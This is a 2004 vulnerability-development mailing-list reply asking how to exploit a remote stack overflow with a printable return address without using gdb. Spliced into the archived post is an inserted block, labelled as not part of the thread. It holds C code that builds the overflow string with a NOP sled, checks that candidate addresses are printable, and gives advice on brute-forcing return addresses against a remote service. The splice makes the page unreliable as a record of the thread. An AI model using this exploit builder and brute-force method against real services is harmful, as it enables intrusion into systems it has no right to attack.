Vulnerability Development mailing list archives
Re: Exploiting network services question
From: just-a-nick () gmx net
Date: Tue, 21 Dec 2004 20:21:19 +0100 (MET)
James Longstreet wrote:
> On Mon, 13 Dec 2004 just-a-nick () gmx net wrote:
> > I have a question regarding the exploitation of network services. If I send the following string to a service ["A"x78]["abcd"][junk - up to 430 bytes]
> I'm not sure I understand your question. Does the value you put in for eip have to be alphabetic, or is the "abcd" simply notation for "anything I want?"
It is (nearly) anything I want, it has to be printable...
> Both are exploitable -- at least theoretically. If the return address can be anything you want, and if that 430 bytes of junk is also controlled by you, put a payload there. Find out the address of that payload (hint: use gdb), and replace "abcd" with that address.
But the service is remote, so I can't use gdb... Is there an elegant way to exploit this kind of vulnerability or do I have to brute-force it?
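The string layout James describes, as an added example that is not part of the thread: a C builder for ["A"x78][address][data] that checks the return-address bytes against the printable constraint just-a-nick mentions (taken here to mean ASCII 0x20..0x7e, an assumption) and fills the unused part of the 430-byte region with a NOP sled, so that a return address guessed anywhere inside the sled still reaches the payload. It assumes a little-endian x86 target; the buffer address 0x41424300 and the one-byte int3 payload are constructed values used only for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout from the thread: 78 bytes of filler, a 4-byte saved return address
 * ("abcd"), then up to 430 bytes of data the attacker also controls. */
#define PAD_LEN    78
#define ADDR_LEN   4
#define JUNK_MAX   430
#define STRING_MAX (PAD_LEN + ADDR_LEN + JUNK_MAX)

/* Assumption: "printable" means ASCII 0x20..0x7e. Returns 1 if every byte of
 * the 32-bit address satisfies that, i.e. the service would accept it. */
int addr_is_printable(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((addr >> (8 * i)) & 0xff);
        if (b < 0x20 || b > 0x7e)
            return 0;
    }
    return 1;
}

/* Builds the attack string into out (capacity STRING_MAX bytes).
 * Assumes a little-endian x86 target: the address is emitted low byte first.
 * The payload sits at the end of the 430-byte region; everything before it
 * is a NOP sled (0x90), so any guessed return address that lands in the
 * sled slides into the payload. Returns the string length, or -1 if the
 * address is not printable or the payload does not fit. */
int build_attack_string(unsigned char *out, uint32_t ret_addr,
                        const unsigned char *payload, size_t payload_len)
{
    if (!addr_is_printable(ret_addr) || payload_len > JUNK_MAX)
        return -1;
    memset(out, 'A', PAD_LEN);
    for (int i = 0; i < ADDR_LEN; i++)
        out[PAD_LEN + i] = (unsigned char)((ret_addr >> (8 * i)) & 0xff);
    size_t sled_len = JUNK_MAX - payload_len;
    memset(out + PAD_LEN + ADDR_LEN, 0x90, sled_len);
    memcpy(out + PAD_LEN + ADDR_LEN + sled_len, payload, payload_len);
    return STRING_MAX;
}

/* buf_addr is where the overflowed buffer starts on the target (what gdb
 * would show on a local copy of the service). Returns 1 if ret_addr lands
 * inside the sled, i.e. if this guess would reach the payload. */
int guess_hits_sled(uint32_t buf_addr, uint32_t ret_addr, size_t payload_len)
{
    uint32_t sled_start = buf_addr + PAD_LEN + ADDR_LEN;
    uint32_t sled_end = sled_start + (uint32_t)(JUNK_MAX - payload_len);
    return ret_addr >= sled_start && ret_addr < sled_end;
}

int main(void)
{
    unsigned char s[STRING_MAX];
    const unsigned char payload[] = { 0xcc };  /* int3 stand-in for shellcode */
    uint32_t buf_addr = 0x41424300;            /* constructed buffer address */
    uint32_t guess = 0x41424360;               /* bytes 60 43 42 41: all printable */

    int n = build_attack_string(s, guess, payload, sizeof payload);
    printf("length=%d addr bytes=%02x %02x %02x %02x hit=%d\n", n,
           s[78], s[79], s[80], s[81],
           guess_hits_sled(buf_addr, guess, sizeof payload));
    printf("0xbffff000 printable? %d\n", addr_is_printable(0xbffff000));
    return 0;
}
```

With a one-byte payload the sled is 429 bytes long, so a guess only has to fall within a window of that size rather than hit one exact address; when no local copy exists to inspect with gdb, stepping candidate addresses by roughly the sled length cuts the number of attempts needed, and the printable check discards candidates the service would reject before they are sent.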
Current thread:
- Exploiting network services question just-a-nick (Dec 13)
- <Possible follow-ups>
- Re: Exploiting network services question Vade 79 (Dec 13)
- Re: Exploiting network services question James Longstreet (Dec 21)
- Re: Exploiting network services question just-a-nick (Dec 23)
- Re: Exploiting network services question James Longstreet (Dec 27)